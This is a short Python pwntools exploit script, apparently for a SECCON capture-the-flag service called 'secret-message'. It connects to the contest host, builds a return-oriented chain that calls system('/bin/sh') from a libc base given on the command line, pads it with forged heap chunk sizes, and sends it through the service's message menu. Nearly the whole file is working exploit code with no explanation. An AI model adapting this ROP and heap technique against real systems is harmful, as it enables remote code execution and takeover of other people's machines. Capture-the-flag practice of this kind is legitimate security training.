#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Auth0r : afang
# nice day mua! :P
# desc:

#lambs:
wait = lambda x: raw_input(x)

# imports

from pwn import *
import time
import os
import sys

elf = ""
libc = ""
env = ""
LOCAL = 1
context.log_level = "debug"
context.arch = "amd64"

#p2 = remote("127.0.0.1",2222)
p2 = remote("secret-message.pwn.seccon.jp", 31337)
print p2.recv()

#create file 

block1 = ""

libc = sys.argv[3]

pop_rdi = p64(0x0000000000406583)
system = int(libc,16) + 0x45390
nop = int(libc,16) + 0x00000000000080d8
rop_payload = pop_rdi + p64(0x60a300) + p64(system) + "/bin/sh\x00"
if "\n" in rop_payload:
    print "no!!!!"
print len(rop_payload)

payload1 = p64(0x60a310) + p64(nop) * 30 + rop_payload + p64(0x21) + "a" * 0x18 + p64(0x21) + "a" * 0x18 + p64(0x21)
payload1 = payload1.ljust(0x200,"a")

p2.sendline("e")
p2.recvuntil("to : \n")
p2.send(payload1)
p2.recvuntil("from : \n")
p2.send(payload1)
p2.recvuntil("filename : \n")
p2.sendline(sys.argv[2])
p2.recvuntil("message length :\n")
p2.sendline(str(sys.argv[1]))
p2.recvuntil("message : \n")
time.sleep(1)
p2.close()


